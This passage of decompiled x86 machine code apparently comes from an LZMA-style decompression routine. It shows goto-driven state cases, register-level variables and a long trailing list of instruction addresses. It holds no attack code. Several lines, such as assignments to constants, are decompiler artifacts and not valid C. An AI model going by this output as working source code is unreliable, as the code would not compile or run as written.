                                                                                                                                                                            											_t284 = __ebp - 0x64;
                                                                                                                                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            											__eflags =  *_t284;
                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            											L80:
                                                                                                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                                                                                                            											goto L81;
                                                                                                                                                                            										case 0x1c:
                                                                                                                                                                            											while(1) {
                                                                                                                                                                            												L124:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            													break;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            												}
                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												_t415 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            												__edx = _t415;
                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            												 *(__ebp - 0x14) = _t415;
                                                                                                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                            													continue;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													L81:
                                                                                                                                                                            													 *(__ebp - 0x88) = 2;
                                                                                                                                                                            													goto L1;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                            											L170:
                                                                                                                                                                            											_push(0x22);
                                                                                                                                                                            											_pop(_t567);
                                                                                                                                                                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                                                                                                            											_t535 = 0;
                                                                                                                                                                            											L172:
                                                                                                                                                                            											return _t535;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								L171:
                                                                                                                                                                            								_t535 = _t534 | 0xffffffff;
                                                                                                                                                                            								goto L172;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						__eax =  *(__ebp - 0x50);
                                                                                                                                                                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            						__eax =  *(__ebp - 0x58);
                                                                                                                                                                            						__esi = __edx + __eax;
                                                                                                                                                                            						 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            						__ax =  *__esi;
                                                                                                                                                                            						__edi = __ax & 0x0000ffff;
                                                                                                                                                                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            						if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            							__cx = __ax;
                                                                                                                                                                            							__cx = __ax >> 5;
                                                                                                                                                                            							__eax = __eax - __ecx;
                                                                                                                                                                            							__edx = __edx + 1;
                                                                                                                                                                            							 *__esi = __ax;
                                                                                                                                                                            							 *(__ebp - 0x50) = __edx;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            							0x800 = 0x800 - __edi;
                                                                                                                                                                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            							 *__esi = __cx;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            							goto L148;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L146;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            				}
                                                                                                                                                                            			}








                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040697a
                                                                                                                                                                            0x0040697a
                                                                                                                                                                            0x0040697e
                                                                                                                                                                            0x004069a3
                                                                                                                                                                            0x004069ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406980
                                                                                                                                                                            0x00406980
                                                                                                                                                                            0x00406983
                                                                                                                                                                            0x00406987
                                                                                                                                                                            0x0040698a
                                                                                                                                                                            0x0040698d
                                                                                                                                                                            0x00406991
                                                                                                                                                                            0x00406991
                                                                                                                                                                            0x00406994
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00406a6e
                                                                                                                                                                            0x00406a75
                                                                                                                                                                            0x00406a75
                                                                                                                                                                            0x00406a78
                                                                                                                                                                            0x00406a7f
                                                                                                                                                                            0x00406aac
                                                                                                                                                                            0x00406ab0
                                                                                                                                                                            0x00406b10
                                                                                                                                                                            0x00406b13
                                                                                                                                                                            0x00406b18
                                                                                                                                                                            0x00406b19
                                                                                                                                                                            0x00406b1b
                                                                                                                                                                            0x00406b1d
                                                                                                                                                                            0x00406b20
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061e2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061eb
                                                                                                                                                                            0x004061ee
                                                                                                                                                                            0x004061f1
                                                                                                                                                                            0x004061f5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061fb
                                                                                                                                                                            0x004061fe
                                                                                                                                                                            0x00406200
                                                                                                                                                                            0x00406201
                                                                                                                                                                            0x00406204
                                                                                                                                                                            0x00406206
                                                                                                                                                                            0x00406207
                                                                                                                                                                            0x00406209
                                                                                                                                                                            0x0040620c
                                                                                                                                                                            0x00406211
                                                                                                                                                                            0x00406216
                                                                                                                                                                            0x0040621f
                                                                                                                                                                            0x00406232
                                                                                                                                                                            0x00406235
                                                                                                                                                                            0x00406241
                                                                                                                                                                            0x00406269
                                                                                                                                                                            0x0040626b
                                                                                                                                                                            0x00406279
                                                                                                                                                                            0x00406279
                                                                                                                                                                            0x0040627d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x00406270
                                                                                                                                                                            0x00406271
                                                                                                                                                                            0x00406271
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x00406247
                                                                                                                                                                            0x0040624c
                                                                                                                                                                            0x0040624c
                                                                                                                                                                            0x00406255
                                                                                                                                                                            0x0040625d
                                                                                                                                                                            0x00406260
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406283
                                                                                                                                                                            0x00406283
                                                                                                                                                                            0x00406287
                                                                                                                                                                            0x00406b33
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b33
                                                                                                                                                                            0x00406290
                                                                                                                                                                            0x004062a0
                                                                                                                                                                            0x004062a3
                                                                                                                                                                            0x004062a6
                                                                                                                                                                            0x004062a6
                                                                                                                                                                            0x004062a6
                                                                                                                                                                            0x004062a9
                                                                                                                                                                            0x004062ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004062af
                                                                                                                                                                            0x004062b5
                                                                                                                                                                            0x004062df
                                                                                                                                                                            0x004062e5
                                                                                                                                                                            0x004062ec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004062ec
                                                                                                                                                                            0x004062bb
                                                                                                                                                                            0x004062be
                                                                                                                                                                            0x004062c3
                                                                                                                                                                            0x004062c3
                                                                                                                                                                            0x004062ce
                                                                                                                                                                            0x004062d6
                                                                                                                                                                            0x004062d9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040631e
                                                                                                                                                                            0x00406324
                                                                                                                                                                            0x00406327
                                                                                                                                                                            0x00406334
                                                                                                                                                                            0x0040633c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004062f3
                                                                                                                                                                            0x004062f3
                                                                                                                                                                            0x004062f7
                                                                                                                                                                            0x00406b42
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b42
                                                                                                                                                                            0x00406303
                                                                                                                                                                            0x0040630e
                                                                                                                                                                            0x0040630e
                                                                                                                                                                            0x0040630e
                                                                                                                                                                            0x00406311
                                                                                                                                                                            0x00406314
                                                                                                                                                                            0x00406317
                                                                                                                                                                            0x0040631c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b9
                                                                                                                                                                            0x004069bf
                                                                                                                                                                            0x004069c5
                                                                                                                                                                            0x004069df
                                                                                                                                                                            0x004069e2
                                                                                                                                                                            0x004069e8
                                                                                                                                                                            0x004069f3
                                                                                                                                                                            0x004069f3
                                                                                                                                                                            0x004069f5
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069d6
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069ff
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a01
                                                                                                                                                                            0x00406a05
                                                                                                                                                                            0x00406bb4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bb4
                                                                                                                                                                            0x00406a11
                                                                                                                                                                            0x00406a18
                                                                                                                                                                            0x00406a20
                                                                                                                                                                            0x00406a23
                                                                                                                                                                            0x00406a26
                                                                                                                                                                            0x00406a26
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406344
                                                                                                                                                                            0x00406346
                                                                                                                                                                            0x00406349
                                                                                                                                                                            0x004063ba
                                                                                                                                                                            0x004063bd
                                                                                                                                                                            0x004063c0
                                                                                                                                                                            0x004063c7
                                                                                                                                                                            0x004063d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004063d1
                                                                                                                                                                            0x0040634b
                                                                                                                                                                            0x0040634f
                                                                                                                                                                            0x00406352
                                                                                                                                                                            0x00406354
                                                                                                                                                                            0x00406357
                                                                                                                                                                            0x0040635a
                                                                                                                                                                            0x0040635c
                                                                                                                                                                            0x0040635f
                                                                                                                                                                            0x00406361
                                                                                                                                                                            0x00406366
                                                                                                                                                                            0x00406369
                                                                                                                                                                            0x0040636c
                                                                                                                                                                            0x00406370
                                                                                                                                                                            0x00406377
                                                                                                                                                                            0x0040637a
                                                                                                                                                                            0x00406381
                                                                                                                                                                            0x00406385
                                                                                                                                                                            0x0040638d
                                                                                                                                                                            0x0040638d
                                                                                                                                                                            0x0040638d
                                                                                                                                                                            0x00406387
                                                                                                                                                                            0x00406387
                                                                                                                                                                            0x00406387
                                                                                                                                                                            0x0040637c
                                                                                                                                                                            0x0040637c
                                                                                                                                                                            0x0040637c
                                                                                                                                                                            0x00406391
                                                                                                                                                                            0x00406394
                                                                                                                                                                            0x004063b2
                                                                                                                                                                            0x004063b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406396
                                                                                                                                                                            0x00406396
                                                                                                                                                                            0x00406399
                                                                                                                                                                            0x0040639c
                                                                                                                                                                            0x0040639f
                                                                                                                                                                            0x004063a1
                                                                                                                                                                            0x004063a1
                                                                                                                                                                            0x004063a1
                                                                                                                                                                            0x004063a4
                                                                                                                                                                            0x004063a7
                                                                                                                                                                            0x004063a9
                                                                                                                                                                            0x004063aa
                                                                                                                                                                            0x004063ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004063ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065e3
                                                                                                                                                                            0x004065e7
                                                                                                                                                                            0x00406605
                                                                                                                                                                            0x00406608
                                                                                                                                                                            0x0040660f
                                                                                                                                                                            0x00406612
                                                                                                                                                                            0x00406615
                                                                                                                                                                            0x00406618
                                                                                                                                                                            0x0040661b
                                                                                                                                                                            0x0040661e
                                                                                                                                                                            0x00406620
                                                                                                                                                                            0x00406627
                                                                                                                                                                            0x00406628
                                                                                                                                                                            0x0040662a
                                                                                                                                                                            0x0040662d
                                                                                                                                                                            0x00406630
                                                                                                                                                                            0x00406633
                                                                                                                                                                            0x00406633
                                                                                                                                                                            0x00406638
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406638
                                                                                                                                                                            0x004065e9
                                                                                                                                                                            0x004065ec
                                                                                                                                                                            0x004065ef
                                                                                                                                                                            0x004065f9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040664d
                                                                                                                                                                            0x00406651
                                                                                                                                                                            0x00406674
                                                                                                                                                                            0x00406677
                                                                                                                                                                            0x0040667a
                                                                                                                                                                            0x00406684
                                                                                                                                                                            0x00406653
                                                                                                                                                                            0x00406653
                                                                                                                                                                            0x00406656
                                                                                                                                                                            0x00406659
                                                                                                                                                                            0x0040665c
                                                                                                                                                                            0x00406669
                                                                                                                                                                            0x0040666c
                                                                                                                                                                            0x0040666c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406690
                                                                                                                                                                            0x00406694
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040669a
                                                                                                                                                                            0x0040669e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066a4
                                                                                                                                                                            0x004066a6
                                                                                                                                                                            0x004066aa
                                                                                                                                                                            0x004066aa
                                                                                                                                                                            0x004066ad
                                                                                                                                                                            0x004066b1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406701
                                                                                                                                                                            0x00406705
                                                                                                                                                                            0x0040670c
                                                                                                                                                                            0x0040670f
                                                                                                                                                                            0x00406712
                                                                                                                                                                            0x0040671c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040671c
                                                                                                                                                                            0x00406707
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406728
                                                                                                                                                                            0x0040672c
                                                                                                                                                                            0x00406733
                                                                                                                                                                            0x00406736
                                                                                                                                                                            0x00406739
                                                                                                                                                                            0x0040672e
                                                                                                                                                                            0x0040672e
                                                                                                                                                                            0x0040672e
                                                                                                                                                                            0x0040673c
                                                                                                                                                                            0x0040673f
                                                                                                                                                                            0x00406742
                                                                                                                                                                            0x00406742
                                                                                                                                                                            0x00406745
                                                                                                                                                                            0x00406748
                                                                                                                                                                            0x0040674b
                                                                                                                                                                            0x0040674b
                                                                                                                                                                            0x0040674e
                                                                                                                                                                            0x00406755
                                                                                                                                                                            0x0040675a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004067e8
                                                                                                                                                                            0x004067e8
                                                                                                                                                                            0x004067ec
                                                                                                                                                                            0x00406b8a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b8a
                                                                                                                                                                            0x004067f2
                                                                                                                                                                            0x004067f5
                                                                                                                                                                            0x004067f8
                                                                                                                                                                            0x004067fc
                                                                                                                                                                            0x004067ff
                                                                                                                                                                            0x00406805
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x00406807
                                                                                                                                                                            0x0040680a
                                                                                                                                                                            0x0040680d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004063dd
                                                                                                                                                                            0x004063dd
                                                                                                                                                                            0x004063e1
                                                                                                                                                                            0x00406b4e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b4e
                                                                                                                                                                            0x004063e7
                                                                                                                                                                            0x004063ea
                                                                                                                                                                            0x004063ed
                                                                                                                                                                            0x004063f1
                                                                                                                                                                            0x004063f4
                                                                                                                                                                            0x004063fa
                                                                                                                                                                            0x004063fc
                                                                                                                                                                            0x004063fc
                                                                                                                                                                            0x004063fc
                                                                                                                                                                            0x004063ff
                                                                                                                                                                            0x00406402
                                                                                                                                                                            0x00406402
                                                                                                                                                                            0x00406405
                                                                                                                                                                            0x00406408
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040640e
                                                                                                                                                                            0x00406414
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040641a
                                                                                                                                                                            0x0040641a
                                                                                                                                                                            0x0040641e
                                                                                                                                                                            0x00406421
                                                                                                                                                                            0x00406424
                                                                                                                                                                            0x00406427
                                                                                                                                                                            0x0040642a
                                                                                                                                                                            0x0040642b
                                                                                                                                                                            0x0040642e
                                                                                                                                                                            0x00406430
                                                                                                                                                                            0x00406436
                                                                                                                                                                            0x00406439
                                                                                                                                                                            0x0040643c
                                                                                                                                                                            0x0040643f
                                                                                                                                                                            0x00406442
                                                                                                                                                                            0x00406445
                                                                                                                                                                            0x00406448
                                                                                                                                                                            0x00406464
                                                                                                                                                                            0x00406467
                                                                                                                                                                            0x0040646a
                                                                                                                                                                            0x0040646d
                                                                                                                                                                            0x00406474
                                                                                                                                                                            0x00406478
                                                                                                                                                                            0x0040647a
                                                                                                                                                                            0x0040647e
                                                                                                                                                                            0x0040644a
                                                                                                                                                                            0x0040644a
                                                                                                                                                                            0x0040644e
                                                                                                                                                                            0x00406456
                                                                                                                                                                            0x0040645b
                                                                                                                                                                            0x0040645d
                                                                                                                                                                            0x0040645f
                                                                                                                                                                            0x0040645f
                                                                                                                                                                            0x00406481
                                                                                                                                                                            0x00406488
                                                                                                                                                                            0x0040648b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406491
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406491
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406496
                                                                                                                                                                            0x00406496
                                                                                                                                                                            0x0040649a
                                                                                                                                                                            0x00406b5a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b5a
                                                                                                                                                                            0x004064a0
                                                                                                                                                                            0x004064a3
                                                                                                                                                                            0x004064a6
                                                                                                                                                                            0x004064aa
                                                                                                                                                                            0x004064ad
                                                                                                                                                                            0x004064b3
                                                                                                                                                                            0x004064b5
                                                                                                                                                                            0x004064b5
                                                                                                                                                                            0x004064b5
                                                                                                                                                                            0x004064b8
                                                                                                                                                                            0x004064bb
                                                                                                                                                                            0x004064bb
                                                                                                                                                                            0x004064bb
                                                                                                                                                                            0x004064c1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004064c3
                                                                                                                                                                            0x004064c6
                                                                                                                                                                            0x004064c9
                                                                                                                                                                            0x004064cc
                                                                                                                                                                            0x004064cf
                                                                                                                                                                            0x004064d2
                                                                                                                                                                            0x004064d5
                                                                                                                                                                            0x004064d8
                                                                                                                                                                            0x004064db
                                                                                                                                                                            0x004064de
                                                                                                                                                                            0x004064e1
                                                                                                                                                                            0x004064f9
                                                                                                                                                                            0x004064fc
                                                                                                                                                                            0x004064ff
                                                                                                                                                                            0x00406502
                                                                                                                                                                            0x00406502
                                                                                                                                                                            0x00406505
                                                                                                                                                                            0x00406509
                                                                                                                                                                            0x0040650b
                                                                                                                                                                            0x004064e3
                                                                                                                                                                            0x004064e3
                                                                                                                                                                            0x004064eb
                                                                                                                                                                            0x004064f0
                                                                                                                                                                            0x004064f2
                                                                                                                                                                            0x004064f4
                                                                                                                                                                            0x004064f4
                                                                                                                                                                            0x0040650e
                                                                                                                                                                            0x00406515
                                                                                                                                                                            0x00406518
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040651a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040651a
                                                                                                                                                                            0x00406518
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x0040651f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040655a
                                                                                                                                                                            0x0040655a
                                                                                                                                                                            0x0040655e
                                                                                                                                                                            0x00406b66
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b66
                                                                                                                                                                            0x00406564
                                                                                                                                                                            0x00406567
                                                                                                                                                                            0x0040656a
                                                                                                                                                                            0x0040656e
                                                                                                                                                                            0x00406571
                                                                                                                                                                            0x00406577
                                                                                                                                                                            0x00406579
                                                                                                                                                                            0x00406579
                                                                                                                                                                            0x00406579
                                                                                                                                                                            0x0040657c
                                                                                                                                                                            0x0040657f
                                                                                                                                                                            0x0040657f
                                                                                                                                                                            0x00406585
                                                                                                                                                                            0x00406523
                                                                                                                                                                            0x00406523
                                                                                                                                                                            0x00406526
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406526
                                                                                                                                                                            0x00406587
                                                                                                                                                                            0x00406587
                                                                                                                                                                            0x0040658a
                                                                                                                                                                            0x0040658d
                                                                                                                                                                            0x00406590
                                                                                                                                                                            0x00406593
                                                                                                                                                                            0x00406596
                                                                                                                                                                            0x00406599
                                                                                                                                                                            0x0040659c
                                                                                                                                                                            0x0040659f
                                                                                                                                                                            0x004065a2
                                                                                                                                                                            0x004065a5
                                                                                                                                                                            0x004065bd
                                                                                                                                                                            0x004065c0
                                                                                                                                                                            0x004065c3
                                                                                                                                                                            0x004065c6
                                                                                                                                                                            0x004065c6
                                                                                                                                                                            0x004065c9
                                                                                                                                                                            0x004065cd
                                                                                                                                                                            0x004065cf
                                                                                                                                                                            0x004065a7
                                                                                                                                                                            0x004065a7
                                                                                                                                                                            0x004065af
                                                                                                                                                                            0x004065b4
                                                                                                                                                                            0x004065b6
                                                                                                                                                                            0x004065b8
                                                                                                                                                                            0x004065b8
                                                                                                                                                                            0x004065d2
                                                                                                                                                                            0x004065d9
                                                                                                                                                                            0x004065dc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040686b
                                                                                                                                                                            0x0040686b
                                                                                                                                                                            0x0040686f
                                                                                                                                                                            0x00406b96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b96
                                                                                                                                                                            0x00406875
                                                                                                                                                                            0x00406878
                                                                                                                                                                            0x0040687b
                                                                                                                                                                            0x0040687f
                                                                                                                                                                            0x00406882
                                                                                                                                                                            0x00406888
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688a
                                                                                                                                                                            0x0040688d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040663b
                                                                                                                                                                            0x0040663b
                                                                                                                                                                            0x0040663e
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a37
                                                                                                                                                                            0x00406a3b
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a59
                                                                                                                                                                            0x00406a60
                                                                                                                                                                            0x00406a67
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a67
                                                                                                                                                                            0x00406a3d
                                                                                                                                                                            0x00406a40
                                                                                                                                                                            0x00406a43
                                                                                                                                                                            0x00406a46
                                                                                                                                                                            0x00406a4d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b28
                                                                                                                                                                            0x00406b2b
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406762
                                                                                                                                                                            0x00406764
                                                                                                                                                                            0x0040676b
                                                                                                                                                                            0x0040676c
                                                                                                                                                                            0x0040676e
                                                                                                                                                                            0x00406771
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406779
                                                                                                                                                                            0x0040677c
                                                                                                                                                                            0x0040677f
                                                                                                                                                                            0x00406781
                                                                                                                                                                            0x00406783
                                                                                                                                                                            0x00406783
                                                                                                                                                                            0x00406784
                                                                                                                                                                            0x00406787
                                                                                                                                                                            0x0040678e
                                                                                                                                                                            0x00406791
                                                                                                                                                                            0x0040679f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a84
                                                                                                                                                                            0x00406a84
                                                                                                                                                                            0x00406a88
                                                                                                                                                                            0x00406bc0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bc0
                                                                                                                                                                            0x00406a8e
                                                                                                                                                                            0x00406a91
                                                                                                                                                                            0x00406a94
                                                                                                                                                                            0x00406a98
                                                                                                                                                                            0x00406a9b
                                                                                                                                                                            0x00406aa1
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa3
                                                                                                                                                                            0x00406aa6
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00406aa9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004067a7
                                                                                                                                                                            0x004067aa
                                                                                                                                                                            0x004067e0
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406910
                                                                                                                                                                            0x00406913
                                                                                                                                                                            0x00406913
                                                                                                                                                                            0x00406916
                                                                                                                                                                            0x00406918
                                                                                                                                                                            0x00406ba2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406ba2
                                                                                                                                                                            0x0040691e
                                                                                                                                                                            0x00406921
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406927
                                                                                                                                                                            0x0040692b
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040692e
                                                                                                                                                                            0x004067ac
                                                                                                                                                                            0x004067ae
                                                                                                                                                                            0x004067b0
                                                                                                                                                                            0x004067b2
                                                                                                                                                                            0x004067b5
                                                                                                                                                                            0x004067b6
                                                                                                                                                                            0x004067b8
                                                                                                                                                                            0x004067ba
                                                                                                                                                                            0x004067bd
                                                                                                                                                                            0x004067c0
                                                                                                                                                                            0x004067d6
                                                                                                                                                                            0x004067db
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406813
                                                                                                                                                                            0x00406817
                                                                                                                                                                            0x00406843
                                                                                                                                                                            0x00406845
                                                                                                                                                                            0x0040684c
                                                                                                                                                                            0x0040684f
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406852
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406857
                                                                                                                                                                            0x00406859
                                                                                                                                                                            0x0040685c
                                                                                                                                                                            0x00406863
                                                                                                                                                                            0x00406866
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406893
                                                                                                                                                                            0x00406896
                                                                                                                                                                            0x00406899
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040690d
                                                                                                                                                                            0x0040689b
                                                                                                                                                                            0x004068a1
                                                                                                                                                                            0x004068a4
                                                                                                                                                                            0x004068a7
                                                                                                                                                                            0x004068aa
                                                                                                                                                                            0x004068ad
                                                                                                                                                                            0x004068b0
                                                                                                                                                                            0x004068b3
                                                                                                                                                                            0x004068b6
                                                                                                                                                                            0x004068b9
